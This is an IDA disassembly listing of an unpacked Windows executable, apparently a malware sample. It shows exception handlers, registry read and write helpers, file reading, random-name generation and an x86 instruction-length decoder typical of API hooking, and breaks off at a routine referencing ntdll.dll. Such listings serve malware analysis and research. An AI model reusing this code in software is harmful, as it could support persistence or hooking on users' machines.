;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 55E17ADCE46B553B68F4DEFD9908DEC6
; File Name : u:\work\55e17adce46b553b68f4defd9908dec6_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
_text segment para public 'DATA' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; DATA XREF: sub_401020+A�o
; sub_41CE01+A�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
xor eax, eax
inc eax
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
jz short locret_40101F
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_40101F: ; CODE XREF: sub_401000+E�j
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401020 proc near ; CODE XREF: sub_40109A+BE�p
; sub_40109A+EC�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
loc_40103D: ; CODE XREF: sub_401020+44�j
; sub_401020+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40106C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40106C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40103D
call dword ptr [ebx+esi*4+8]
jmp short loc_40103D
; ---------------------------------------------------------------------------
loc_40106C: ; CODE XREF: sub_401020+2A�j
; sub_401020+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_401020 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107A proc near ; CODE XREF: sub_40109A+B1�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset sub_401092
push [ebp+arg_0]
call sub_407AA4 ; RtlUnwind
sub_40107A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401092 proc near ; DATA XREF: sub_40107A+B�o
; sub_41CE5B+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401092 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40109A proc near ; DATA XREF: sub_401219+10�o
; sub_404ED7+A�o ...
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
cld
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
mov dword_41A08C, eax
mov dword_41A090, ebx
test dword ptr [eax+4], 6
jnz loc_40117F
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov dword_41A090, eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4010DD: ; CODE XREF: sub_40109A+DC�j
cmp esi, 0FFFFFFFFh
jz loc_40118E
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40116D
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov dword_41A030, eax
mov edx, [ebp+var_14]
mov eax, [edx]
mov dword_41A034, eax
mov eax, [edx+4]
mov dword_41A038, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, dword_41A03C
mov esi, dword_41A034
rep movsd
lea edi, dword_41A03C
mov dword_41A034, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40116D
js short loc_40117B
mov edi, [ebx+8]
push ebx
call sub_40107A
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_401020
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_40116D: ; CODE XREF: sub_40109A+54�j
; sub_40109A+A9�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_4010DD
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_40109A+AB�j
xor eax, eax
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_40117F: ; CODE XREF: sub_40109A+23�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_401020
add esp, 0Ch
loc_40118E: ; CODE XREF: sub_40109A+46�j
push 0
mov dword_41A010, 0Bh
push 0Bh
call sub_407E34
add esp, 8
or eax, eax
jnz short loc_4011C9
push 0
mov dword_41A010, 8
push 8
call sub_407E34
add esp, 8
or eax, eax
jnz short loc_4011C9
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_4011C9: ; CODE XREF: sub_40109A+10C�j
; sub_40109A+126�j
cmp eax, 0FFFFFFFFh
jz short loc_4011F8
push eax
push dword_41A010
call sub_407E34
add esp, 8
push dword_41A010
call sub_407E1C
add esp, 4
mov eax, 1
loc_4011F0: ; CODE XREF: sub_40109A+E3�j
; sub_40109A+12D�j ...
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_40109A+132�j
cmp dword_41A02C, 0
jnz short loc_401208
mov eax, 1
jmp short loc_4011F0
; ---------------------------------------------------------------------------
loc_401208: ; CODE XREF: sub_40109A+165�j
mov eax, dword_41A02C
push 0Bh
jmp eax
sub_40109A endp
; ---------------------------------------------------------------------------
pop eax
mov eax, 1
jmp short loc_4011F0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401219 proc near ; CODE XREF: .aspack:00427501�j
; DATA XREF: .aspack:loc_4274FC�o
var_30 = word ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
mov eax, large fs:0
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_41A01C
push offset sub_40109A
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
push eax
fnstcw [esp+30h+var_30]
or [esp+30h+var_30], 300h
fldcw [esp+30h+var_30]
add esp, 4
push 0
push 0
push offset dword_41A028
push offset dword_41A024
push offset dword_41A020
call sub_407DBC
push dword_41A028
push dword_41A024
push dword_41A020
mov dword_41A014, esp
call sub_407868
add esp, 18h
xor ecx, ecx
mov [ebp+var_4], ecx
push eax
call sub_407DEC
leave
retn
sub_401219 endp
; ---------------------------------------------------------------------------
mov large fs:0, eax
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40129C proc near ; CODE XREF: sub_404FCE+E9�p
var_14C0C = dword ptr -14C0Ch
var_14C08 = byte ptr -14C08h
push ebp
mov ebp, esp
mov eax, 14C0Ch
call sub_4078CC
push esi
push edi
push 0
push 0
push 3
push 0
push 0
push 80000000h
push offset dword_408120
call sub_407A8C ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4012CF
xor eax, eax
jmp short loc_401322
; ---------------------------------------------------------------------------
loc_4012CF: ; CODE XREF: sub_40129C+2D�j
push 0
lea eax, [ebp+var_14C0C]
push eax
push 14C08h
lea eax, [ebp+var_14C08]
push eax
push esi
call sub_407A98 ; ReadFile
push esi
call sub_407984 ; CloseHandle
xor edi, edi
loc_4012F2: ; CODE XREF: sub_40129C+82�j
push 1
push offset byte_419260
lea eax, [ebp+edi+var_14C08]
push eax
call sub_401429
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_401315
xor eax, eax
inc eax
jmp short loc_401322
; ---------------------------------------------------------------------------
loc_401315: ; CODE XREF: sub_40129C+72�j
add edi, 11h
cmp edi, [ebp+var_14C0C]
jb short loc_4012F2
xor eax, eax
loc_401322: ; CODE XREF: sub_40129C+31�j
; sub_40129C+77�j
pop edi
pop esi
leave
retn
sub_40129C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401326 proc near ; CODE XREF: sub_403D8E+65�p
; sub_405AAC+DD�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407D44 ; RegOpenKeyExA
mov edi, eax
or edi, edi
jz short loc_40134B
xor eax, eax
jmp short loc_401376
; ---------------------------------------------------------------------------
loc_40134B: ; CODE XREF: sub_401326+1F�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_407D50 ; RegQueryValueExA
mov edi, eax
push [ebp+var_4]
call sub_407D38 ; RegCloseKey
or edi, edi
jz short loc_401373
xor eax, eax
jmp short loc_401376
; ---------------------------------------------------------------------------
loc_401373: ; CODE XREF: sub_401326+47�j
xor eax, eax
inc eax
loc_401376: ; CODE XREF: sub_401326+23�j
; sub_401326+4B�j
pop edi
leave
retn
sub_401326 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401379 proc near ; CODE XREF: sub_403BC5+55�p
; sub_403BC5+76�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push eax
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407D2C ; RegCreateKeyExA
mov edi, eax
or edi, edi
jz short loc_4013A9
xor eax, eax
jmp short loc_4013E1
; ---------------------------------------------------------------------------
loc_4013A9: ; CODE XREF: sub_401379+2A�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_407D5C ; RegSetValueExA
mov edi, eax
push [ebp+var_4]
call sub_407D38 ; RegCloseKey
or edi, edi
jz short loc_4013D1
xor eax, eax
jmp short loc_4013E1
; ---------------------------------------------------------------------------
loc_4013D1: ; CODE XREF: sub_401379+52�j
cmp [ebp+var_8], 1
jnz short loc_4013DE
mov eax, 2
jmp short loc_4013E1
; ---------------------------------------------------------------------------
loc_4013DE: ; CODE XREF: sub_401379+5C�j
xor eax, eax
inc eax
loc_4013E1: ; CODE XREF: sub_401379+2E�j
; sub_401379+56�j ...
pop edi
leave
retn
sub_401379 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4013E4 proc near ; CODE XREF: sub_403659+CE�p
; sub_405AAC+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
xor esi, esi
jmp short loc_401416
; ---------------------------------------------------------------------------
loc_4013F1: ; CODE XREF: sub_4013E4+35�j
call sub_407E28
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 61h
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_401416: ; CODE XREF: sub_4013E4+B�j
cmp esi, [ebp+arg_4]
jl short loc_4013F1
mov eax, [ebp+arg_4]
mov byte ptr [ebx+eax], 0
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4013E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401429 proc near ; CODE XREF: sub_40129C+65�p
; sub_4034AD+30�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
and [ebp+var_8], 0
and [ebp+var_4], 0
jmp short loc_40148D
; ---------------------------------------------------------------------------
loc_40143E: ; CODE XREF: sub_401429+76�j
xor ebx, ebx
mov edi, ebx
jmp short loc_40147A
; ---------------------------------------------------------------------------
loc_401444: ; CODE XREF: sub_401429+5F�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
movsx edx, byte ptr [esi+edi]
cmp eax, edx
jnz short loc_401459
inc ebx
loc_401459: ; CODE XREF: sub_401429+2D�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_40145E: ; CODE XREF: sub_401429+3A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40145E
cmp ebx, eax
jnz short loc_401479
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_401479
mov eax, [ebp+var_4]
jmp short loc_4014A6
; ---------------------------------------------------------------------------
loc_401479: ; CODE XREF: sub_401429+3E�j
; sub_401429+49�j
inc edi
loc_40147A: ; CODE XREF: sub_401429+19�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_40147F: ; CODE XREF: sub_401429+5B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40147F
cmp edi, eax
jb short loc_401444
inc [ebp+var_4]
loc_40148D: ; CODE XREF: sub_401429+13�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_401495: ; CODE XREF: sub_401429+71�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_401495
cmp [ebp+var_4], eax
jb short loc_40143E
mov eax, 0FFFFh
loc_4014A6: ; CODE XREF: sub_401429+4E�j
pop edi
pop esi
pop ebx
leave
retn
sub_401429 endp
; ---------------------------------------------------------------------------
push ebx
push esi
push edi
mov esi, [esp+18h]
mov ebx, [esp+1Ch]
mov edi, esi
jmp short loc_4014D8
; ---------------------------------------------------------------------------
loc_4014BA: ; CODE XREF: .text:004014DA�j
mov eax, [esp+10h]
movsx eax, byte ptr [eax+edi]
mov edx, edi
sub edx, esi
mov ecx, [esp+14h]
movsx edx, byte ptr [ecx+edx]
cmp eax, edx
jz short loc_4014D7
xor eax, eax
inc eax
jmp short loc_4014DE
; ---------------------------------------------------------------------------
loc_4014D7: ; CODE XREF: .text:004014D0�j
inc edi
loc_4014D8: ; CODE XREF: .text:004014B8�j
cmp edi, ebx
jl short loc_4014BA
xor eax, eax
loc_4014DE: ; CODE XREF: .text:004014D5�j
pop edi
pop esi
pop ebx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4014E2 proc near ; CODE XREF: sub_403659+2F�p
; sub_403D8E+29F�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push [ebp+arg_0]
call sub_407A8C ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_40151B
cmp [ebp+arg_4], 0
jz short loc_401517
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_401517: ; CODE XREF: sub_4014E2+2D�j
xor eax, eax
jmp short loc_40155B
; ---------------------------------------------------------------------------
loc_40151B: ; CODE XREF: sub_4014E2+27�j
push 0
push edi
call sub_407954 ; GetFileSize
mov esi, eax
add eax, 10h
push eax
push 40h
call sub_407A5C ; LocalAlloc
mov ebx, eax
push 0
cmp [ebp+arg_4], 0
jz short loc_401542
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
jmp short loc_401548
; ---------------------------------------------------------------------------
loc_401542: ; CODE XREF: sub_4014E2+56�j
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
loc_401548: ; CODE XREF: sub_4014E2+5E�j
push [ebp+var_8]
push esi
push ebx
push edi
call sub_407A98 ; ReadFile
push edi
call sub_407984 ; CloseHandle
mov eax, ebx
loc_40155B: ; CODE XREF: sub_4014E2+37�j
pop edi
pop esi
pop ebx
leave
retn
sub_4014E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401560 proc near ; CODE XREF: sub_403659+3CB�p
; sub_405AAC+76F�p
push ebp
mov ebp, esp
push ebx
push esi
sub_401560 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401565 proc near ; DATA XREF: .data:0041DF15�o
push edi
mov esi, [ebp+8]
mov ebx, [ebp+0Ch]
mov edi, ebx
jmp short loc_40159E
; ---------------------------------------------------------------------------
loc_401570: ; CODE XREF: sub_401565+3D�j
cmp byte ptr [esi+edi], 0Dh
jnz short loc_40159D
mov eax, edi
sub eax, ebx
push eax
mov eax, esi
add eax, ebx
push eax
push dword ptr [ebp+10h]
call sub_407E04
add esp, 0Ch
mov eax, edi
sub eax, ebx
mov edx, [ebp+10h]
mov byte ptr [edx+eax], 0
mov eax, edi
add eax, 2
jmp short loc_4015E7
; ---------------------------------------------------------------------------
loc_40159D: ; CODE XREF: sub_401565+F�j
inc edi
loc_40159E: ; CODE XREF: sub_401565+9�j
cmp byte ptr [esi+edi], 0
jnz short loc_401570
or ebx, ebx
jz short loc_4015C2
cmp byte ptr [esi+edi], 0
jnz short loc_4015C2
mov eax, edi
dec eax
cmp byte ptr [esi+eax], 0Ah
jnz short loc_4015C2
mov eax, [ebp+10h]
mov byte ptr [eax], 0
mov eax, ebx
inc eax
jmp short loc_4015E7
; ---------------------------------------------------------------------------
loc_4015C2: ; CODE XREF: sub_401565+41�j
; sub_401565+47�j ...
mov eax, esi
add eax, ebx
push eax
call sub_407B4C ; lstrlenA
mov edi, eax
or edi, edi
jz short loc_4015E5
mov eax, esi
add eax, ebx
push eax
push dword ptr [ebp+10h]
call sub_4078EC
mov eax, ebx
add eax, edi
jmp short loc_4015E7
; ---------------------------------------------------------------------------
loc_4015E5: ; CODE XREF: sub_401565+6B�j
xor eax, eax
loc_4015E7: ; CODE XREF: sub_401565+36�j
; sub_401565+5B�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_401565 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015EC proc near ; CODE XREF: sub_401D98+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
mov esi, [ebp+arg_0]
inc dword_41A1FC
mov ecx, esi
and ds:dword_408004, 0
and ds:dword_408FF4, 0
and ds:dword_40900C, 0
and ds:dword_408110, 0
mov ds:dword_408FD8, 4
mov ds:dword_408A34, 4
loc_40162E: ; CODE XREF: sub_4015EC+100�j
; sub_4015EC+11C�j ...
mov eax, ecx
inc ecx
mov al, [eax]
mov ds:byte_408A30, al
movzx eax, ds:byte_408A30
or eax, eax
jl loc_401874
cmp eax, 0FFh
jg loc_401874
jmp off_41A200[eax*4]
loc_401659: ; CODE XREF: sub_4015EC+24D�j
; DATA XREF: .data:off_41A200�o ...
or byte ptr ds:dword_408FF4, 40h
jmp loc_401874
; ---------------------------------------------------------------------------
inc dword_41A1FC
loc_40166B: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
xor eax, eax
cmp byte ptr [ecx], 20h
setnz al
dec eax
and eax, 4
inc eax
mov [ebp+var_4], eax
add ds:dword_40900C, eax
jmp loc_401874
; ---------------------------------------------------------------------------
loc_401686: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
or byte ptr ds:dword_408FF4, 40h
test byte ptr [ecx], 38h
jnz loc_401874
loc_401696: ; CODE XREF: sub_4015EC+66�j
; DATA XREF: .data:0041A210�o ...
test ds:byte_408A30, 1
jz short loc_4016AF
mov eax, ds:dword_408FD8
add ds:dword_40900C, eax
jmp loc_401874
; ---------------------------------------------------------------------------
loc_4016AF: ; CODE XREF: sub_4015EC+B1�j
inc ds:dword_40900C
jmp loc_401874
; ---------------------------------------------------------------------------
loc_4016BA: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
inc ds:dword_40900C
jmp loc_401874
; ---------------------------------------------------------------------------
inc dword_41A1FC
loc_4016CB: ; CODE XREF: sub_4015EC+66�j
; DATA XREF: .data:0041A298�o ...
test byte ptr ds:dword_408FF4, 10h
jz short loc_4016DB
xor eax, eax
jmp loc_40199D
; ---------------------------------------------------------------------------
loc_4016DB: ; CODE XREF: sub_4015EC+E6�j
or byte ptr ds:dword_408FF4, 10h
mov al, ds:byte_408A30
mov ds:byte_40811C, al
jmp loc_40162E
; ---------------------------------------------------------------------------
loc_4016F1: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
test byte ptr ds:dword_408FF4, 4
jz short loc_401701
xor eax, eax
jmp loc_40199D
; ---------------------------------------------------------------------------
loc_401701: ; CODE XREF: sub_4015EC+10C�j
or byte ptr ds:dword_408FF4, 4
jmp loc_40162E
; ---------------------------------------------------------------------------
loc_40170D: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
test byte ptr ds:dword_408FF4, 8
jz short loc_40171D
xor eax, eax
jmp loc_40199D
; ---------------------------------------------------------------------------
loc_40171D: ; CODE XREF: sub_4015EC+128�j
or byte ptr ds:dword_408FF4, 8
mov al, ds:byte_408A30
mov ds:byte_409120, al
jmp loc_40162E
; ---------------------------------------------------------------------------
loc_401733: ; CODE XREF: sub_4015EC+66�j
; DATA XREF: .data:0041A398�o
test byte ptr ds:dword_408FF4, 1
jz short loc_401743
xor eax, eax
jmp loc_40199D
; ---------------------------------------------------------------------------
loc_401743: ; CODE XREF: sub_4015EC+14E�j
or byte ptr ds:dword_408FF4, 1
mov ds:dword_408FD8, 2
jmp loc_40162E
; ---------------------------------------------------------------------------
loc_401759: ; CODE XREF: sub_4015EC+66�j
; DATA XREF: .data:0041A39C�o
test byte ptr ds:dword_408FF4, 2
jz short loc_401769
xor eax, eax
jmp loc_40199D
; ---------------------------------------------------------------------------
loc_401769: ; CODE XREF: sub_4015EC+174�j
or byte ptr ds:dword_408FF4, 2
mov ds:dword_408A34, 2
jmp loc_40162E
; ---------------------------------------------------------------------------
inc dword_41A1FC
loc_401785: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
inc ds:dword_40900C
or byte ptr ds:dword_408FF4, 40h
jmp loc_401874
; ---------------------------------------------------------------------------
loc_401797: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
mov eax, ds:dword_408FD8
add ds:dword_40900C, eax
or byte ptr ds:dword_408FF4, 40h
jmp loc_401874
; ---------------------------------------------------------------------------
loc_4017AE: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
mov eax, ds:dword_408FD8
add eax, 2
add ds:dword_40900C, eax
jmp loc_401874
; ---------------------------------------------------------------------------
loc_4017C1: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
mov eax, ds:dword_408A34
add ds:dword_408110, eax
jmp loc_401874
; ---------------------------------------------------------------------------
loc_4017D1: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
mov eax, ds:dword_408FD8
add ds:dword_40900C, eax
jmp loc_401874
; ---------------------------------------------------------------------------
inc dword_41A1FC
loc_4017E7: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
add ds:dword_40900C, 2
jmp loc_401874
; ---------------------------------------------------------------------------
loc_4017F3: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
add ds:dword_40900C, 3
jmp short loc_401874
; ---------------------------------------------------------------------------
loc_4017FC: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+24D�j
; DATA XREF: ...
xor eax, eax
jmp loc_40199D
; ---------------------------------------------------------------------------
loc_401803: ; CODE XREF: sub_4015EC+66�j
; DATA XREF: .data:0041A23C�o
or byte ptr ds:dword_408FF4, 20h
mov eax, ecx
inc ecx
mov al, [eax]
mov ds:byte_419130, al
movzx eax, ds:byte_419130
or eax, eax
jl short loc_40186D
cmp eax, 0Bh
jg short loc_40182B
jmp off_41A600[eax*4]
; ---------------------------------------------------------------------------
loc_40182B: ; CODE XREF: sub_4015EC+236�j
cmp eax, 80h
jl short loc_40186D
cmp eax, 0CFh
jg short loc_40186D
jmp off_41A430[eax*4]
loc_401840: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+238�j
; DATA XREF: ...
or byte ptr ds:dword_408FF4, 40h
jmp short loc_401874
; ---------------------------------------------------------------------------
inc dword_41A1FC
jmp short loc_401874
; ---------------------------------------------------------------------------
loc_401851: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+238�j ...
mov eax, ds:dword_408FD8
add ds:dword_40900C, eax
jmp short loc_401874
; ---------------------------------------------------------------------------
loc_40185E: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+238�j ...
inc ds:dword_40900C
or byte ptr ds:dword_408FF4, 40h
jmp short loc_401874
; ---------------------------------------------------------------------------
loc_40186D: ; CODE XREF: sub_4015EC+66�j
; sub_4015EC+231�j ...
xor eax, eax
jmp loc_40199D
; ---------------------------------------------------------------------------
loc_401874: ; CODE XREF: sub_4015EC+55�j
; sub_4015EC+60�j ...
inc dword_41A1FC
test byte ptr ds:dword_408FF4, 40h
jz loc_40192F
mov eax, ecx
inc ecx
mov al, [eax]
mov ds:byte_419144, al
movzx eax, ds:byte_419144
and eax, 0C0h
mov byte ptr [ebp+var_4+3], al
movzx eax, ds:byte_419144
and eax, 7
mov byte ptr [ebp+var_4+2], al
movzx eax, byte ptr [ebp+var_4+3]
cmp eax, 0C0h
jz short loc_40192F
cmp byte ptr [ebp+var_4+3], 40h
jnz short loc_4018C4
inc ds:dword_408110
loc_4018C4: ; CODE XREF: sub_4015EC+2D0�j
movzx eax, byte ptr [ebp+var_4+3]
cmp eax, 80h
jnz short loc_4018DA
mov eax, ds:dword_408A34
add ds:dword_408110, eax
loc_4018DA: ; CODE XREF: sub_4015EC+2E1�j
cmp ds:dword_408A34, 2
jnz short loc_4018F8
cmp byte ptr [ebp+var_4+3], 0
jnz short loc_40192F
cmp byte ptr [ebp+var_4+2], 6
jnz short loc_40192F
add ds:dword_408110, 2
jmp short loc_40192F
; ---------------------------------------------------------------------------
loc_4018F8: ; CODE XREF: sub_4015EC+2F5�j
cmp byte ptr [ebp+var_4+2], 4
jnz short loc_40191C
or byte ptr ds:dword_408FF4, 80h
mov eax, ecx
inc ecx
mov al, [eax]
mov ds:byte_408FD4, al
movzx eax, ds:byte_408FD4
and eax, 7
mov byte ptr [ebp+var_4+2], al
loc_40191C: ; CODE XREF: sub_4015EC+310�j
cmp byte ptr [ebp+var_4+2], 5
jnz short loc_40192F
cmp byte ptr [ebp+var_4+3], 0
jnz short loc_40192F
add ds:dword_408110, 4
loc_40192F: ; CODE XREF: sub_4015EC+295�j
; sub_4015EC+2CA�j ...
and ds:dword_408114, 0
jmp short loc_401950
; ---------------------------------------------------------------------------
loc_401938: ; CODE XREF: sub_4015EC+36F�j
mov eax, ecx
inc ecx
mov edx, ds:dword_408114
mov al, [eax]
mov ds:byte_408A28[edx], al
inc ds:dword_408114
loc_401950: ; CODE XREF: sub_4015EC+34A�j
mov eax, ds:dword_408110
cmp ds:dword_408114, eax
jb short loc_401938
and ds:dword_408114, 0
jmp short loc_40197E
; ---------------------------------------------------------------------------
loc_401966: ; CODE XREF: sub_4015EC+39D�j
mov eax, ecx
inc ecx
mov edx, ds:dword_408114
mov al, [eax]
mov ds:byte_419370[edx], al
inc ds:dword_408114
loc_40197E: ; CODE XREF: sub_4015EC+378�j
mov eax, ds:dword_40900C
cmp ds:dword_408114, eax
jb short loc_401966
inc dword_41A1FC
mov eax, ecx
sub eax, esi
mov ds:dword_408004, eax
xor eax, eax
inc eax
loc_40199D: ; CODE XREF: sub_4015EC+EA�j
; sub_4015EC+110�j ...
pop esi
pop ebx
leave
retn
sub_4015EC endp
; =============== S U B R O U T I N E =======================================
sub_4019A1 proc near ; CODE XREF: sub_401EAF+10�p
push edi
push offset aNtdll_dll ; "ntdll.dll"
